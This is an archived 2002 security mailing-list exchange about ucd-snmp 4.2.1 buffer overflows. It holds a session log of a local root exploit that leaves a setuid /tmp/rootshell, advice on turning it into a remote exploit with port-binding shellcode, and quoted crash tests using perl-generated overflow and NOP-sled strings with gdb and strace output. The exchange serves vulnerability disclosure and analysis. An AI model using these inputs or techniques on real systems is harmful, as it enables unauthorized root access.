Well, I did get positive results on a Slackware 8.0 box running ucd-snmpd 4.2.1:

-----
itchie@napalm:~$ /usr/local/sbin/snmpd --version
UCD-snmp version:  4.2.1
Author:            Wes Hardaker
Email:             ucd-snmp-coders@ucd-snmp.ucdavis.edu
itchie@napalm:~$ ps -ax|grep snmpd
 3686 pts/0    S      0:00 /usr/local/sbin/snmpd
itchie@napalm:~$ ls -l /tmp/p00p
/bin/ls: /tmp/p00p: No such file or directory
itchie@napalm:~$ ls -l /tmp/rootshell*
/bin/ls: /tmp/rootshell*: No such file or directory
itchie@napalm:~$ ./snmpdex
Promisc Digital Research Group presents a local exploit for ucd-snmp-4.2.1
Coded by The Itch
http://www.promisc.org
ps: leaves a rootshell in /tmp/rootshell
Timeout: No Response from 127.0.0.1
bash-2.05# id
uid=0(root) gid=0(root) groups=100(users)
bash-2.05# ls -l /tmp/rootshell
-rwsr-xr-x    1 root     root        13456 Feb 21 22:33 /tmp/rootshell
bash-2.05# ps -ax|grep snmp
bash-2.05#
-------------

You could make it remote too, by adjusting the shellcode to something
port-binding. However, the problems that I encountered: the length to crash
snmpd must be exactly 256 bytes; one more or one less will give no result.
The string, however, gets cut in half by snmpd, so the only really useful
part is the first half, which is about 144 bytes long.

have fun,

-----

On Wed, 20 Feb 2002, KF wrote:

I am not so sure about those proof-of-concept remote snmp exploits that were
posted... they look more like local exploits to me.

[root@linuxppc root]# ps -ef | grep snmp
root      6355     1 17 15:02 pts/1    00:00:59 /usr/sbin/snmpd -s -l /dev/null

(gdb) r 127.0.0.1 public `perl -e 'print "A" x 293'`
Starting program: /usr/bin/snmpwalk 127.0.0.1 public `perl -e 'print "A" x 293'`

Program received signal SIGSEGV, Segmentation fault.
0x0ff963c0 in read_objid () from /usr/lib/libsnmp-0.4.2.1.so
(gdb) bt
#0  0x0ff963c0 in read_objid () from /usr/lib/libsnmp-0.4.2.1.so
#1  0x0ff99358 in snmp_parse_oid () from /usr/lib/libsnmp-0.4.2.1.so
#2  0x10000e28 in _init ()
#3  0x0fc6eb90 in __libc_start_main () from /lib/libc.so.6
(gdb) r 127.0.0.1 public `perl -e 'print "A" x 308'`
Starting program: /usr/bin/snmpwalk 127.0.0.1 public `perl -e 'print "A" x 308'`

Program received signal SIGILL, Illegal instruction.
0x41414100 in ?? ()
(gdb) r 127.0.0.1 public `perl -e 'print "A" x 309'`
Starting program: /usr/bin/snmpwalk 127.0.0.1 public `perl -e 'print "A" x 309'`

Program received signal SIGILL, Illegal instruction.
0x41414140 in ?? ()

This is snmpwalk NOT snmpd dying...

[root@linuxppc root]# ps -ef | grep snmp
root      6355     1  5 15:02 pts/1    00:00:59 /usr/sbin/snmpd -s -l /dev/null

Still running... OK, let's use a newer version of snmpwalk.

[root@linuxppc ucd-snmp-4.2.2]# apps/snmpwalk 127.0.0.1 public `perl -e 'print "A" x 309'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAA: Unknown Object Identifier (AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)

[root@linuxppc root]# ps -ef | grep snmp
root      6355     1  4 15:02 pts/1    00:00:59 /usr/sbin/snmpd -s -l /dev/null

still running...

These are the examples I have seen in various emails as methods to exploit
snmpd... These seem to do nothing on my box to the client or the daemon...

snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 256'`
execl("snmpwalk", "snmpwalk", "-p", port, host, buf, NULL);
execl("/usr/local/bin/snmpwalk","snmpwalk",argv[1],"-c",buffer,NULL);

Here are my results.

[root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 -c `perl -e 'print "A" x 256'`
Timeout: No Response from 127.0.0.1
[root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 450'`
Timeout: No Response from 127.0.0.1
[root@linuxppc mail.snosoft.com]# snmpwalk -p 161 127.0.0.1 `perl -e 'print "A" x 4050'`
Timeout: No Response from 127.0.0.1

Additional findings.

[root@linuxppc mail.snosoft.com]# snmpwalk -p 161 127.0.0.1 public `perl -e 'print "A" x 4050'`
Segmentation fault
[root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 -c public `perl -e 'print "A" x 4050'`
Segmentation fault

Meanwhile the daemon reads the requests with no problems...

[0fc4abcc] _newselect(0x5, 0x7fffe808, 0x7fffe888, 0x7fffe908, 0) = 1
[0fc5211c] recvfrom(4, "0\202\1\352\2\1\0\4\202\1\310\220\220\220\220\220\220\220"..., 8192, 0, {sin_family=AF_INET, sin_port=htons(32795), sin_addr=inet_addr("127.0.0.1")}}, [16]) = 494
[0fc142b4] gettimeofday({1014238429, 731763}, NULL) = 0
[0fc4abcc] _newselect(0x5, 0x7fffe808, 0x7fffe888, 0x7fffe908, 0) = 1
[0fc5211c] recvfrom(4, "0\202\1\352\2\1\0\4\202\1\310\220\220\220\220\220\220\220"..., 8192, 0, {sin_family=AF_INET, sin_port=htons(32795), sin_addr=inet_addr("127.0.0.1")}}, [16]) = 494
[0fc142b4] gettimeofday({1014238430, 739274}, NULL) = 0

[root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 3999'`
Timeout: No Response from 127.0.0.1

[0fc5211c] recvfrom(4, "0\202\17\301\2\1\0\4\202\17\237\220\220\220\220\220\220"..., 8192, 0, {sin_family=AF_INET, sin_port=htons(32795), sin_addr=inet_addr("127.0.0.1")}}, [16]) = 4037
[0fc142b4] gettimeofday({1014238568, 885323}, NULL) = 0
[0fc4abcc] _newselect(0x5, 0x7fffe808, 0x7fffe888, 0x7fffe908, 0) = 1
[0fc5211c] recvfrom(4, "0\202\17\301\2\1\0\4\202\17\237\220\220\220\220\220\220"..., 8192, 0, {sin_family=AF_INET, sin_port=htons(32795), sin_addr=inet_addr("127.0.0.1")}}, [16]) = 4037

Give it too many chars and snmpwalk complains.

[root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 5000'`
snmpwalk: Error building ASN.1 representation

Again, YOUR results may vary... these are mine.

-KF
This archive was generated by hypermail 2b30 : Thu Feb 21 2002 - 15:43:31 PST